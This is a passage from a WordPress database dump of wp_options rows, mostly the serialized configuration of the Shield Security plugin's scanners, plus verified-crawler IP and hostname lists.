17:\"2607:ff68:107::41\";i:109;s:17:\"2607:ff68:107::42\";i:110;s:17:\"2607:ff68:107::43\";i:111;s:17:\"2607:ff68:107::44\";i:112;s:17:\"2607:ff68:107::45\";i:113;s:17:\"2607:ff68:107::46\";i:114;s:17:\"2607:ff68:107::47\";i:115;s:17:\"2607:ff68:107::48\";i:116;s:17:\"2607:ff68:107::49\";i:117;s:17:\"2607:ff68:107::50\";i:118;s:17:\"2607:ff68:107::51\";i:119;s:17:\"2607:ff68:107::52\";i:120;s:17:\"2607:ff68:107::53\";i:121;s:17:\"2607:ff68:107::54\";i:122;s:17:\"2607:ff68:107::55\";i:123;s:24:\"2a03:b0c0:2:d0::fa3:e001\";i:124;s:24:\"2a03:b0c0:1:d0::e54:a001\";i:125;s:26:\"2604:a880:800:10::4e6:f001\";i:126;s:26:\"2604:a880:cad:d0::122:7001\";i:127;s:24:\"2a03:b0c0:3:d0::33e:4001\";i:128;s:38:\"2600:1f16:775:3a01:70d6:601a:1eb5:dbb9\";i:129;s:36:\"2600:1f11:56a:9000:23:651b:dac0:9be4\";i:130;s:23:\"2a03:b0c0:3:d0::44:f001\";i:131;s:25:\"2a03:b0c0:0:1010::2b:b001\";i:132;s:23:\"2a03:b0c0:1:d0::22:5001\";i:133;s:25:\"2604:a880:400:d0::4f:3001\";i:134;s:23:\"2400:6180:0:d0::16:d001\";i:135;s:25:\"2604:a880:cad:d0::18:f001\";i:136;s:37:\"2600:1f18:179:f900:88b2:b3d:e487:e2f4\";}}}}s:8:\"crawlers\";a:12:{s:6:\"ahrefs\";a:4:{s:4:\"name\";s:6:\"Ahrefs\";s:12:\"host_pattern\";s:22:\"#.+\\.ahrefs\\.com\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:9:\"AhrefsBot\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:5:\"apple\";a:4:{s:4:\"name\";s:8:\"AppleBot\";s:12:\"host_pattern\";s:31:\"#.+\\.applebot\\.apple\\.com\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:9:\"Applebot/\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:5:\"baidu\";a:4:{s:4:\"name\";s:8:\"BaiduBot\";s:12:\"host_pattern\";s:33:\"#.+\\.crawl\\.baidu\\.(com|jp)\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:5:\"baidu\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:4:\"bing\";a:4:{s:4:\"name\";s:7:\"BingBot\";s:12:\"host_pattern\";s:27:\"#.+\\.search\\.msn\\.com\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:7:\"bingbot\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:8:\"facebook\";a:4:{s:4:\"name\";s:8:\"Facebook\";s:12:\"host_pattern\";s:24:\"#.+\\.facebook\\.com\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:19:\"facebookexternalhit\";}s:4:\"type\";a:1:{i:0;s:12:\"social_media\";}}s:6:\"google\";a:4:{s:4:\"name\";s:9:\"GoogleBot\";s:12:\"host_pattern\";s:28:\"#.+\\.google(bot)?\\.com\\.?$#i\";s:6:\"agents\";a:4:{i:0;s:9:\"Googlebot\";i:1;s:11:\"APIs-Google\";i:2;s:13:\"AdsBot-Google\";i:3;s:20:\"Mediapartners-Google\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:6:\"huawei\";a:4:{s:4:\"name\";s:15:\"Huawei/PetalBot\";s:12:\"host_pattern\";s:38:\"#.+\\.(aspiegel|petalsearch)\\.com\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:8:\"PetalBot\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:9:\"pinterest\";a:4:{s:4:\"name\";s:12:\"PinterestBot\";s:12:\"host_pattern\";s:25:\"#.+\\.pinterest\\.com\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:12:\"Pinterestbot\";}s:4:\"type\";a:1:{i:0;s:12:\"social_media\";}}s:7:\"semrush\";a:4:{s:4:\"name\";s:7:\"SEMRush\";s:12:\"host_pattern\";s:23:\"#.+\\.semrush\\.com\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:10:\"SemrushBot\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:6:\"seznam\";a:4:{s:4:\"name\";s:9:\"SeznamBot\";s:12:\"host_pattern\";s:35:\"#fulltextrobot-.*\\.seznam\\.cz\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:10:\"SeznamBot/\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:5:\"yahoo\";a:4:{s:4:\"name\";s:8:\"YahooBot\";s:12:\"host_pattern\";s:28:\"#.*\\.crawl\\.yahoo\\.net\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:6:\"yahoo!\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}s:6:\"yandex\";a:4:{s:4:\"name\";s:9:\"YandexBot\";s:12:\"host_pattern\";s:31:\"#.*\\.yandex\\.(com|ru|net)\\.?$#i\";s:6:\"agents\";a:1:{i:0;s:15:\"yandex.com/bots\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}}}}','no'),(463248,'can_compress_scripts','0','no'),(463270,'hustle_previous_version','4.4.0','no'),(463366,'itsec_file_change_scan_destroyed','1611653190','no'),(463325,'keyring_credentials','a:1:{s:10:\"eventbrite\";a:3:{s:6:\"app_id\";s:0:\"\";s:3:\"key\";s:0:\"\";s:6:\"secret\";s:0:\"\";}}','yes'),(468216,'_site_transient_shield_mod_config_72163b36127e33befc92c015e6d0a73d','a:9:{s:4:\"slug\";s:12:\"hack_protect\";s:10:\"properties\";a:14:{s:4:\"slug\";s:12:\"hack_protect\";s:4:\"name\";s:10:\"Hack Guard\";s:12:\"sidebar_name\";s:8:\"Scanners\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"hack_protect\";s:7:\"tagline\";s:63:\"Automatically detect and repair vulnerable and suspicious items\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:5:\"order\";i:70;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:5:\"wpcli\";a:1:{s:4:\"root\";s:10:\"hack_guard\";}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:5:\"Scans\";s:4:\"slug\";s:14:\"scans-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"scans-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:13:\"scans_results\";}}}s:8:\"sections\";a:7:{i:0;a:6:{s:4:\"slug\";s:18:\"section_file_guard\";s:7:\"primary\";b:1;s:5:\"title\";s:10:\"File Guard\";s:11:\"title_short\";s:10:\"File Guard\";s:9:\"beacon_id\";i:217;s:7:\"summary\";a:2:{i:0;s:86:\"Purpose - Monitor WordPress files and protect against malicious intrusion and hacking.\";i:1;s:56:\"Recommendation - Keep the File Guard features turned on.\";}}i:1;a:5:{s:4:\"slug\";s:16:\"section_scan_wpv\";s:5:\"title\";s:21:\"Vulnerability Scanner\";s:11:\"title_short\";s:21:\"Vulnerability Scanner\";s:9:\"beacon_id\";i:217;s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Regularly scan your WordPress plugins and themes for known security vulnerabilities.\";i:1;s:125:\"Recommendation - Ensure this is turned on and you will always know if any of your assets have known security vulnerabilities.\";}}i:2;a:5:{s:4:\"slug\";s:16:\"section_realtime\";s:5:\"title\";s:25:\"Realtime Change Detection\";s:11:\"title_short\";s:25:\"Realtime Change Detection\";s:9:\"beacon_id\";i:226;s:7:\"summary\";a:2:{i:0;s:85:\"Purpose - Monitor Your WordPress Site For Changes To Critical Components In Realtime.\";i:1;s:59:\"Recommendation - Keep The Realtime Change Detection Active.\";}}i:3;a:5:{s:4:\"slug\";s:16:\"section_scan_ufc\";s:5:\"title\";s:26:\"Unrecognised Files Scanner\";s:11:\"title_short\";s:26:\"Unrecognised Files Scanner\";s:9:\"beacon_id\";i:395;s:7:\"summary\";a:2:{i:0;s:84:\"Purpose - Scan your WordPress core folders for unrecognised files that don\'t belong.\";i:1;s:71:\"Recommendation - Keep the Unrecognised Files Scanner feature turned on.\";}}i:4;a:5:{s:4:\"slug\";s:20:\"section_scan_options\";s:5:\"title\";s:12:\"Scan Options\";s:11:\"title_short\";s:12:\"Scan Options\";s:9:\"beacon_id\";i:217;s:7:\"summary\";a:1:{i:0;s:54:\"Purpose - Set how often the Hack Guard scans will run.\";}}i:5;a:5:{s:4:\"slug\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:5:\"title\";s:25:\"Enable Module: Hack Guard\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:217;s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Hack Guard is a set of tools to warn you and protect you against hacks on your site.\";i:1;s:54:\"Recommendation - Keep the Hack Guard module turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{i:0;a:11:{s:3:\"key\";s:19:\"enable_hack_protect\";s:7:\"section\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf38\";s:9:\"link_blog\";s:19:\"https://shsec.io/9x\";s:9:\"beacon_id\";i:217;s:4:\"name\";s:17:\"Enable Hack Guard\";s:7:\"summary\";s:41:\"Enable (or Disable) The Hack Guard Module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the Hack Guard module\";}i:1;a:10:{s:3:\"key\";s:16:\"enabled_scan_apc\";s:7:\"section\";s:16:\"section_scan_wpv\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/ew\";s:9:\"link_blog\";s:19:\"https://shsec.io/eo\";s:9:\"beacon_id\";i:225;s:4:\"name\";s:24:\"Abandoned Plugin Scanner\";s:7:\"summary\";s:35:\"Enable The Abandoned Plugin Scanner\";s:11:\"description\";s:66:\"Scan your WordPress.org assets for whether they\'ve been abandoned.\";}i:2;a:11:{s:3:\"key\";s:18:\"enable_wpvuln_scan\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/du\";s:9:\"link_blog\";s:19:\"https://shsec.io/ah\";s:9:\"beacon_id\";i:137;s:4:\"name\";s:21:\"Vulnerability Scanner\";s:7:\"summary\";s:32:\"Enable The Vulnerability Scanner\";s:11:\"description\";s:66:\"Scan all your WordPress assets for known security vulnerabilities.\";}i:3;a:10:{s:3:\"key\";s:22:\"wpvuln_scan_autoupdate\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Automatic Updates\";s:7:\"summary\";s:49:\"Apply Updates Automatically To Vulnerable Plugins\";s:11:\"description\";s:98:\"When an update becomes available, automatically apply updates to items with known vulnerabilities.\";}i:4;a:10:{s:3:\"key\";s:31:\"enable_core_file_integrity_scan\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hd\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf37\";s:9:\"beacon_id\";i:224;s:4:\"name\";s:20:\"WP Core File Scanner\";s:7:\"summary\";s:56:\"Automatically Scans WordPress Core Files For Alterations\";s:11:\"description\";s:145:\"Compares all WordPress core files on your site against the official WordPress files. WordPress Core files should never be altered for any reason.\";}i:5;a:11:{s:3:\"key\";s:15:\"mal_scan_enable\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/fp\";s:9:\"link_blog\";s:19:\"https://shsec.io/fx\";s:9:\"beacon_id\";i:222;s:4:\"name\";s:22:\"Automatic Malware Scan\";s:7:\"summary\";s:27:\"Enable Malware File Scanner\";s:11:\"description\";s:56:\"When enabled the Malware scanner will run automatically.\";}i:6;a:11:{s:3:\"key\";s:10:\"ptg_enable\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/bl\";s:9:\"link_blog\";s:19:\"https://shsec.io/bm\";s:9:\"beacon_id\";i:133;s:4:\"name\";s:20:\"Enable/Disable Guard\";s:7:\"summary\";s:43:\"Enable The Guard For Plugin And Theme Files\";s:11:\"description\";s:90:\"When enabled the Guard will automatically scan for changes to your Plugin and Theme files.\";}i:7;a:12:{s:3:\"key\";s:11:\"file_locker\";s:7:\"section\";s:16:\"section_realtime\";s:7:\"premium\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"wpconfig\";s:4:\"text\";s:9:\"WP Config\";}i:1;a:2:{s:9:\"value_key\";s:13:\"root_htaccess\";s:4:\"text\";s:14:\"Root .htaccess\";}i:2;a:2:{s:9:\"value_key\";s:10:\"root_index\";s:4:\"text\";s:14:\"Root index.php\";}i:3;a:2:{s:9:\"value_key\";s:14:\"root_webconfig\";s:4:\"text\";s:15:\"Root Web.Config\";}}s:9:\"link_info\";s:19:\"https://shsec.io/h7\";s:9:\"link_blog\";s:19:\"https://shsec.io/h8\";s:9:\"beacon_id\";i:226;s:4:\"name\";s:11:\"File Locker\";s:7:\"summary\";s:40:\"Lock Files Against Tampering and Changes\";s:11:\"description\";s:97:\"As soon as changes are detected to any selected files, the contents may be examined and reverted.\";}i:8;a:11:{s:3:\"key\";s:17:\"file_repair_areas\";s:7:\"section\";s:18:\"section_file_guard\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:2:{i:0;s:2:\"wp\";i:1;s:6:\"plugin\";}s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:2:\"wp\";s:4:\"text\";s:7:\"WP Core\";}i:1;a:2:{s:9:\"value_key\";s:6:\"plugin\";s:4:\"text\";s:12:\"Plugin Files\";}i:2;a:2:{s:9:\"value_key\";s:5:\"theme\";s:4:\"text\";s:11:\"Theme Files\";}}s:9:\"link_info\";s:23:\"https://shsec.io/wpsf36\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf37\";s:9:\"beacon_id\";i:228;s:4:\"name\";s:16:\"Auto File Repair\";s:7:\"summary\";s:45:\"Which Files Should Be Automatically Repaired?\";s:11:\"description\";s:80:\"When a file is modified, or malware is detected, Shield can try to repair files.\";}i:9;a:12:{s:3:\"key\";s:14:\"scan_frequency\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"1\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:8:{i:0;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Once\";}i:1;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:24:\"Twice (scan every 12hrs)\";}i:2;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:25:\"3 Times (scan every 8hrs)\";}i:3;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:25:\"4 Times (scan every 6hrs)\";}i:4;a:2:{s:9:\"value_key\";s:1:\"6\";s:4:\"text\";s:25:\"6 Times (scan every 4hrs)\";}i:5;a:2:{s:9:\"value_key\";s:1:\"8\";s:4:\"text\";s:25:\"8 Times (scan every 3hrs)\";}i:6;a:2:{s:9:\"value_key\";s:2:\"12\";s:4:\"text\";s:26:\"12 Times (scan every 2hrs)\";}i:7;a:2:{s:9:\"value_key\";s:2:\"24\";s:4:\"text\";s:26:\"24 Times (scan every hour)\";}}s:9:\"link_info\";s:19:\"https://shsec.io/b2\";s:9:\"link_blog\";s:19:\"https://shsec.io/kd\";s:9:\"beacon_id\";i:223;s:4:\"name\";s:14:\"Scan Frequency\";s:7:\"summary\";s:60:\"Number Of Times To Automatically Scan Core Files In 24 Hours\";s:11:\"description\";s:85:\"Default: Once every 24hrs. To improve security, increase the number of scans per day.\";}i:10;a:11:{s:3:\"key\";s:37:\"enable_unrecognised_file_cleaner_scan\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";s:19:\"enabled_report_only\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:19:\"enabled_report_only\";s:4:\"text\";s:26:\"Scan Enabled - Report Only\";}i:2;a:2:{s:9:\"value_key\";s:19:\"enabled_delete_only\";s:4:\"text\";s:41:\"Scan Enabled - Automatically Delete Files\";}}s:9:\"link_info\";s:19:\"https://shsec.io/9y\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:9:\"beacon_id\";i:227;s:4:\"name\";s:26:\"Unrecognised Files Scanner\";s:7:\"summary\";s:45:\"Scans Core Directories For Unrecognised Files\";s:11:\"description\";s:128:\"Scans for, and automatically deletes, any files in your core WordPress folders that are not part of your WordPress installation.\";}i:11;a:11:{s:3:\"key\";s:16:\"ufc_scan_uploads\";s:7:\"section\";s:16:\"section_scan_ufc\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/he\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:9:\"beacon_id\";i:347;s:4:\"name\";s:12:\"Scan Uploads\";s:7:\"summary\";s:42:\"Scan Uploads Folder For PHP and Javascript\";s:11:\"description\";s:86:\"The Uploads folder is primarily for media, but could be used to store nefarious files.\";}i:12;a:11:{s:3:\"key\";s:14:\"ufc_exclusions\";s:7:\"section\";s:16:\"section_scan_ufc\";s:8:\"advanced\";b:1;s:7:\"default\";a:11:{i:0;s:9:\"error_log\";i:1;s:13:\"php_error_log\";i:2;s:9:\".htaccess\";i:3;s:9:\".htpasswd\";i:4;s:9:\".user.ini\";i:5;s:7:\"php.ini\";i:6;s:10:\"web.config\";i:7;s:12:\"php_mail.log\";i:8;s:8:\"mail.log\";i:9;s:35:\"wp-content/uploads/bb-plugin/cache/\";i:10;s:35:\"wp-content/uploads/cache/wpml/twig/\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/9z\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:9:\"beacon_id\";i:231;s:4:\"name\";s:15:\"File Exclusions\";s:7:\"summary\";s:52:\"Provide A List Of Files To Be Excluded From The Scan\";s:11:\"description\";s:89:\"Take a new line for each file you wish to exclude from the scan. No commas are necessary.\";}i:13;a:10:{s:3:\"key\";s:23:\"mal_autorepair_surgical\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Surgical Auto-Repair\";s:7:\"summary\";s:55:\"Automatically Attempt To Surgically Remove Malware Code\";s:11:\"description\";s:58:\"Attempts to automatically remove code from infected files.\";}i:14;a:11:{s:3:\"key\";s:19:\"ptg_reinstall_links\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/bp\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:135;s:4:\"name\";s:21:\"Show Re-Install Links\";s:7:\"summary\";s:33:\"Show Re-Install Links For Plugins\";s:11:\"description\";s:78:\"Show links to re-install plugins and offer re-install when activating plugins.\";}i:15;a:11:{s:3:\"key\";s:19:\"auto_filter_results\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:0;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:439;s:4:\"name\";s:19:\"Auto-Filter Results\";s:7:\"summary\";s:48:\"Automatically Filter Results Of Irrelevant Items\";s:11:\"description\";s:60:\"Automatically remove items from results that are irrelevant.\";}i:16;a:12:{s:3:\"key\";s:20:\"scan_path_exclusions\";s:7:\"section\";s:20:\"section_scan_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:10:{i:0;s:17:\"wp-content/cache/\";i:1;s:18:\"wp-content/nfwlog/\";i:2;s:18:\"wp-content/wflogs/\";i:3;s:11:\"*/error_log\";i:4;s:15:\"*/php_error_log\";i:5;s:10:\"*/mail.log\";i:6;s:14:\"*/php_mail.log\";i:7;s:23:\"*/.stylelintrc-css.json\";i:8;s:19:\"*/.stylelintrc.json\";i:9;s:14:\"*/sucuri-*.php\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:441;s:4:\"name\";s:15:\"Scan Exclusions\";s:7:\"summary\";s:31:\"Scan File and Folder Exclusions\";s:11:\"description\";s:32:\"Scan File and Folder Exclusions.\";}i:17;a:6:{s:3:\"key\";s:14:\"scans_to_build\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:18;a:6:{s:3:\"key\";s:12:\"is_scan_cron\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}i:19;a:6:{s:3:\"key\";s:14:\"mal_fp_reports\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:20;a:6:{s:3:\"key\";s:16:\"filelocker_state\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:14:{s:14:\"all_scan_slugs\";a:6:{i:0;s:3:\"apc\";i:1;s:3:\"mal\";i:2;s:3:\"ptg\";i:3;s:3:\"wpv\";i:4;s:3:\"wcf\";i:5;s:3:\"ufc\";}s:20:\"file_scan_extensions\";a:11:{i:0;s:3:\"php\";i:1;s:4:\"php5\";i:2;s:4:\"php7\";i:3;s:2:\"js\";i:4;s:4:\"json\";i:5;s:3:\"css\";i:6;s:3:\"htm\";i:7;s:4:\"html\";i:8;s:3:\"svg\";i:9;s:4:\"twig\";i:10;s:3:\"hbs\";}s:10:\"db_classes\";a:3:{s:10:\"filelocker\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\FileLocker\\Handler\";s:7:\"scanner\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Scanner\\Handler\";s:5:\"scanq\";s:68:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\ScanQueue\\Handler\";}s:19:\"db_table_filelocker\";a:4:{s:4:\"slug\";s:10:\"filelocker\";s:14:\"has_updated_at\";b:1;s:11:\"cols_custom\";a:5:{s:4:\"file\";s:61:\"varchar(256) NOT NULL COMMENT \'File Path relative to ABSPATH\'\";s:13:\"hash_original\";s:54:\"varchar(40) NOT NULL COMMENT \'SHA1 File Hash Original\'\";s:12:\"hash_current\";s:53:\"varchar(40) NOT NULL COMMENT \'SHA1 File Hash Current\'\";s:7:\"content\";s:28:\"MEDIUMBLOB COMMENT \'Content\'\";s:13:\"public_key_id\";s:52:\"TINYINT(2) UNSIGNED NOT NULL COMMENT \'Public Key ID\'\";}s:15:\"cols_timestamps\";a:3:{s:11:\"detected_at\";s:20:\"Change Last Detected\";s:11:\"reverted_at\";s:18:\"Reverted To Backup\";s:11:\"notified_at\";s:17:\"Notification Sent\";}}s:16:\"db_table_scanner\";a:3:{s:4:\"slug\";s:7:\"scanner\";s:11:\"cols_custom\";a:4:{s:4:\"hash\";s:58:\"varchar(32) NOT NULL DEFAULT \'\' COMMENT \'Unique Item Hash\'\";s:4:\"meta\";s:33:\"text COMMENT \'Relevant Item Data\'\";s:4:\"scan\";s:50:\"varchar(10) NOT NULL DEFAULT 0 COMMENT \'Scan Type\'\";s:8:\"severity\";s:44:\"int(3) NOT NULL DEFAULT 1 COMMENT \'Severity\'\";}s:15:\"cols_timestamps\";a:2:{s:10:\"ignored_at\";s:19:\"Scan Result Ignored\";s:11:\"notified_at\";s:21:\"Scan Notifiation Sent\";}}s:14:\"db_table_scanq\";a:3:{s:4:\"slug\";s:5:\"scanq\";s:11:\"cols_custom\";a:4:{s:4:\"scan\";s:50:\"varchar(3) NOT NULL DEFAULT \'\' COMMENT \'Scan Slug\'\";s:5:\"items\";s:34:\"text COMMENT \'Array of scan items\'\";s:7:\"results\";s:31:\"text COMMENT \'Array of results\'\";s:4:\"meta\";s:24:\"text COMMENT \'Meta Data\'\";}s:15:\"cols_timestamps\";a:2:{s:10:\"started_at\";s:12:\"Scan Started\";s:11:\"finished_at\";s:14:\"Scan Completed\";}}s:21:\"table_name_filelocker\";s:10:\"filelocker\";s:19:\"url_mal_sigs_simple\";s:96:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_raw.txt\";s:18:\"url_mal_sigs_regex\";s:95:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_re.txt\";s:23:\"default_whitelist_paths\";a:12:{i:0;s:18:\"wp-content/cache/*\";i:1;s:19:\"wp-content/shield/*\";i:2;s:26:\"wp-content/icwp/rollback/*\";i:3;s:35:\"wp-content/plugins-before-restore/*\";i:4;s:34:\"wp-content/themes-before-restore/*\";i:5;s:36:\"wp-content/uploads/bb-plugin/cache/*\";i:6;s:36:\"wp-content/uploads/cache/wpml/twig/*\";i:7;s:18:\"wp-content/cache/*\";i:8;s:11:\"*/error_log\";i:9;s:15:\"*/php_error_log\";i:10;s:10:\"*/mail.log\";i:11;s:14:\"*/php_mail.log\";}s:14:\"cron_all_scans\";s:9:\"all-scans\";s:14:\"wcf_exclusions\";a:5:{i:0;s:11:\"readme.html\";i:1;s:11:\"license.txt\";i:2;s:16:\"licens-sv_SE.txt\";i:3;s:20:\"wp-config-sample.php\";i:4;s:11:\"wp-content/\";}s:27:\"wcf_exclusions_missing_only\";a:2:{i:0;s:20:\"wp-admin/install.php\";i:1;s:10:\"xmlrpc.php\";}s:6:\"events\";a:21:{s:14:\"apc_alert_sent\";a:0:{}s:14:\"mal_alert_sent\";a:0:{}s:14:\"ptg_alert_sent\";a:0:{}s:14:\"ufc_alert_sent\";a:0:{}s:14:\"wcf_alert_sent\";a:0:{}s:14:\"wpv_alert_sent\";a:0:{}s:12:\"apc_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"mal_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"ptg_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"ufc_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"wcf_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"wpv_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:14:\"apc_scan_found\";a:3:{s:3:\"cat\";i:2;s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:14:\"mal_scan_found\";a:3:{s:3:\"cat\";i:3;s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:14:\"ptg_scan_found\";a:3:{s:3:\"cat\";i:3;s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:14:\"ufc_scan_found\";a:3:{s:3:\"cat\";i:3;s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:14:\"wcf_scan_found\";a:3:{s:3:\"cat\";i:3;s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:14:\"wpv_scan_found\";a:3:{s:3:\"cat\";i:3;s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:24:\"scan_item_repair_success\";a:2:{s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:21:\"scan_item_repair_fail\";a:1:{s:14:\"audit_multiple\";b:1;}s:24:\"scan_item_delete_success\";a:1:{s:14:\"audit_multiple\";b:1;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468211,'_site_transient_shield_mod_config_fefc8687bc08707a1b4dd5fce08bbd83','a:6:{s:10:\"properties\";a:16:{s:4:\"slug\";s:6:\"plugin\";s:4:\"name\";s:16:\"General 